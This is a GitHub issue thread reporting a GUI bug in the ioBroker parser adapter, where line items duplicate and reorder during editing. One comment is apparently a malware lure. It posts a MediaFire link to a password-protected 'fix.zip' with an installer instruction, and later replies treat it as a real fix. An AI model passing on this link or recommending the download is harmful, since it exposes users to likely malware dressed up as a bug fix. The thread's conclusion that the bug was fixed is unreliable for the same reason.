### ISSUE TITLE
new lines are getting duplicated and flipping around sorting when changing

### ISSUE THREAD

**Issue by looxer01** [ioBroker/ioBroker.parser#270]
**Describe the bug**  
new lines are getting duplicated and flipping the sorting when changing

**To Reproduce**  
1. Go to Instance
2. Click on edit
3. Add a line items (only test when already line items existing. and add a Name
4. Now the gui is duplicating names and keeps flipping around sequences

**Expected behavior**  
when adding a line item then it should come up with one line which is in fact doing it
when adding a name it should not duplicate the entry
when changing a name it should not flip around the sequence of line items but possibly sort it after pressing save

**Screenshots & Logfiles**  
If applicable, add screenshots and logfiles to help explain your problem.

**Versions:**  
 - Adapter version: 2.2.2
 - JS-Controller version: 6.0.11
 - Node version: <node-version> 20.17.0
 - Operating system: Bookworm latest updates

**Additional context**

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by looxer01** [comment]
vielen dank für den schnellen Fix :)

**Comment by Apollon77** [comment]
Doy ou have a bit more details? Example? Log? Screenshot? Anything?

**Comment by Apollon77** [comment]
Ok, seems alsready fixed
